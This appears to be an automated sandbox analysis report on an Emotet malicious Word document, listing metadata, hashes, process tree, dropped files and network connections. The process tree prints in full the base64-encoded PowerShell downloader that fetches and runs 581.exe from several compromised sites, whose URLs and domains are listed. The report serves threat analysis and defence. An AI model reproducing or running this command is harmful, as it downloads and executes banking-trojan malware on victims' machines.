File name: | DKMNT_06.doc |
Full analysis: | https://app.any.run/tasks/13908304-1444-43c8-b9c7-b085f0464b39 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 13:38:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Totam sit quidem., Author: Ctibor Samson, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 6 06:22:00 2019, Last Saved Time/Date: Wed Nov 6 06:22:00 2019, Number of Pages: 1, Number of Words: 25, Number of Characters: 146, Security: 0 |
MD5: | AB006B31931824DBAEF3421A3481249A |
SHA1: | A791F66BD53B55B83198F3F77BDB6ED00ACD25CF |
SHA256: | D80E0540DBE6B907C8F950173A73DF05E5348ED07A545E22FF78D03E2168B389 |
SSDEEP: | 3072:ugzu2QPH+UaqFh50r/SzFaSadGBrjC48+WZ/yOhh+/pMmVCSWmfEnhf:CHNaqCSzGdD48+ayOnhmVCSWjN |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 170 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 146 |
Words: | 25 |
Pages: | 1 |
ModifyDate: | 2019:11:06 06:22:00 |
CreateDate: | 2019:11:06 06:22:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Ctibor Samson |
Subject: | - |
Title: | Totam sit quidem. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2172 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DKMNT_06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3832 | powershell -enco JABMAGUAZQBnAGwAaQB1AGEAdgBiAD0AJwBOAG8AZQBnAGcAYgBvAHYAJwA7ACQAQwBqAGwAcwBrAHAAegBtAGEAbQBjAGUAdQAgAD0AIAAnADUAOAAxACcAOwAkAFQAZQBxAGMAcAByAGcAYQBpAG0AeQB1AD0AJwBRAG4AcQBoAGkAcQBxAHAAbwBsAHgAJwA7ACQAUQBlAGkAZQBjAHcAagBnAHEAcgB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDAGoAbABzAGsAcAB6AG0AYQBtAGMAZQB1ACsAJwAuAGUAeABlACcAOwAkAFYAYwBmAG8AdwBjAGsAbABiAD0AJwBFAGoAbwBhAG4AbwBvAHUAcwAnADsAJABZAGkAbgB3AGgAdwBrAGcAZgBpAGgAPQAmACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAFEAagBhAGIAeABsAGYAZABnAD0AJwBoAHQAdABwADoALwAvAHMAaQByAGEAagBoAHUAbQBtAHUAcwAuAGMAbwBtAC8AegBzAGYALwB1AG8AegBnAGYAZwAtAHYAOABkAHIANAAzAC0ANgA1ADEALwAqAGgAdAB0AHAAOgAvAC8AbQBhAHIAaQBlAHYAYQAuAHAAcgBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFEAcwBQAFQAagBtAC8AKgBoAHQAdABwAHMAOgAvAC8AYgByAG8AdABoAGUAcgBzAHAAcgBvAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGcAbwBqAGkAZwB1AG8ALQBqAHAAdgBhAC0AMwA4ADgANgA2ADUAMgA3ADAALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGQAbwBsAGwAcwBxAHUAZQBlAG4AcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGsAUQBCAEoAaQBvAFMAbAAvACoAaAB0AHQAcABzADoALwAvAGIAbABvAGcALgB2AHEALQBjAGEAcgBzAC4AdQBrAC8AYwBhAGwAZQBuAGQAYQByAC8ANgA0AG8ALQBkADkAOQBiAGkAaABuAC0AOAA3ADkAOAA5ADcAOAAzAC8AJwAuACIAcwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAE4AeQBuAGcAdABjAGQAcABlAGUAdAA9ACcAWQBjAHgAYwByAGIAYgBwAHQAagAnADsAZgBvAHIAZQBhAGMAaAAoACQAWAB2AHYAeQBlAGIAbwB4AHkAdQBtAGUAdAAgAGkAbgAgACQAUQBqAGEAYgB4AGwAZgBkAGcAKQB7AHQAcgB5AHsAJABZAGkAbgB3AGgAdwBrAGcAZgBpAGgALgAiAGQAYABPAHcAbgBsAGAAbwBBAEQAZgBJAGwAZQAiACgAJABYAHYAdgB5AGUAYgBvAHgAeQB1AG0AZQB0ACwAIAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApADsAJABCAHEAYwBhAHgAYwBkAG4AZgBvAGgAYgBwAD0AJwBIAGwAcABiAGsAeABlAGMAawAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApAC4AIgBsAEUAYABOAGAAZwBUAEgAIgAgAC0AZwBlACAAMwAyADYANwA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgB0ACIAKAAkAFEAZQBpAGUAYwB3AGoAZwBxAHIAeAApADsAJABSAHIAYQB1AG8AbABoAHMAPQAnAFAAaABjAHEAeABmAGoAdgAnADsAYgByAGUAYQBrADsAJABJAHQAdQBkAGQAaQByAGIAdwBuAD0AJwBLAHoAbAB3AGUAdQB0AHAAaQBxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAaAB6AHUAYQB6AHQAcAB0AD0AJwBZAHgAeABxAGcAdABmAHYAegBqAGYAeAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1780 | "C:\Users\admin\581.exe" | C:\Users\admin\581.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
2252 | --cd90012c | C:\Users\admin\581.exe | 581.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
736 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 581.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Version: 12.0.6606.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA812.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AF42AD3.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ADD57F59.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5445ED86.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2EF5B84.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34823DB5.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AD92E8B.wmf | — | |
MD5:— | SHA256:— | |||
2172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1125BF10.wmf | — | |
MD5:— | SHA256:— | |||
3832 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BPMJ19WDJ932RHDZS11H.temp | — | |
MD5:— | SHA256:— | |||
3832 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bcc3.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3832 | powershell.exe | GET | 301 | 157.230.26.143:80 | http://marieva.pro/wp-content/QsPTjm/ | US | html | 185 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3832 | powershell.exe | 157.230.26.143:443 | marieva.pro | Joao Carlos de Almeida Silveira trading as Bitcanal | US | unknown |
3832 | powershell.exe | 157.230.26.143:80 | marieva.pro | Joao Carlos de Almeida Silveira trading as Bitcanal | US | unknown |
3832 | powershell.exe | 108.61.119.164:443 | brotherspromotions.com | Choopa, LLC | US | unknown |
3832 | powershell.exe | 160.153.43.0:80 | sirajhummus.com | GoDaddy.com, LLC | US | suspicious |
3832 | powershell.exe | 51.140.181.93:443 | blog.vq-cars.uk | Microsoft Corporation | GB | unknown |
3832 | powershell.exe | 107.180.58.52:443 | www.dollsqueens.com | GoDaddy.com, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
sirajhummus.com |
| whitelisted |
dns.msftncsi.com |
| shared |
marieva.pro |
| unknown |
brotherspromotions.com |
| unknown |
www.dollsqueens.com |
| unknown |
blog.vq-cars.uk |
| unknown |